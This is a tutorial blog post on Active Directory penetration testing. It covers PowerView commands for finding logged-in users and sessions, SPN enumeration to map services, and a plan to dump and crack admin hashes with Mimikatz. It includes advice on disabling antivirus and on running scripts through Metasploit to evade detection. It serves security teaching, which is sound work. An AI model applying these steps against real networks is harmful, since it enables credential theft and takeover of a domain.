Introduction

In this tutorial, I’m going to walk you through some key techniques for Active Directory penetration testing. I’ve noticed there aren’t a lot of great video resources out there on this topic, so I wanted to share my process for enumerating logged-in users and discovering services running on a domain controller.

Finding Out Who’s Logged In

First, I’ll show you how to figure out which users are currently logged into the network. For this, I use a fantastic script called PowerView.

  • Getting the Script: You can grab PowerView from GitHub. A quick heads-up: your antivirus will probably flag it as malicious, so you might need to disable it temporarily just to download the script.
  • A Note for Real-World Scenarios: If you’ve already gained a foothold on a Windows machine within the network, I highly recommend using Metasploit’s load powershell command to run PowerView. If you try to run PowerShell scripts directly, you’re much more likely to get caught by antivirus software, and all your hard work will be for nothing.
  • The Commands:
    • Get-NetLoggedOn: This command is useful for seeing who’s logged into the specific machine you’ve compromised. I wouldn’t recommend running this across the entire domain controller, though.
    • Get-NetSession: This is the real powerhouse. It lists all the active sessions across the entire domain controller, giving you IP addresses, machine names, and more. This is how you can spot high-value targets, like system administrators.
  • What’s Next? Once I’ve identified a logged-in administrator, my next move is to use a tool like Mimikatz to dump their password hashes. I can then take those hashes offline and try to crack them to gain full administrative access.

Discovering Running Services with SPNs

Next, I’ll show you how to discover Service Principal Names (SPNs). Think of SPNs as connections between a service (like a web server or email server) and a user account in Active Directory.

  • Why Bother with SPNs? By enumerating SPNs, I can get a clear picture of all the services running on the system, such as IIS, Exchange, DNS, or FTP.
  • How to Do It: I use another offensive security script for this. I just need to modify the script’s filter to tell it which service I’m interested in. For example, I can set the search filter to service principal name and then specify a service like dns.
  • What You’ll Find: The output from this script is incredibly valuable. It gives me the service name, the users who are using the service, the SPN itself, and the account that’s running the service. This can even tell me which organizational unit is using the server, which helps me understand if it’s a high-priority target.

Putting It All Together: The Attack Plan

The whole point of all this enumeration is to gather as much intelligence as possible—users, groups, logged-in users, running services, etc.—so I can formulate a solid attack plan.

For example, if I find a logged-in admin, I’ll go after their password hashes. If I find services like FTP or HTTP running, I can try to escalate my attack through web application vulnerabilities or brute-force attacks.

I’ll wrap up by reminding you to always save these scripts locally and use Metasploit to run them in a real-world scenario to stay under the radar. In my next video, I’ll show you how to take the next step: dumping those admin hashes and gaining full control of the Active Directory. Stay tuned!

Video Walk-through

, ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles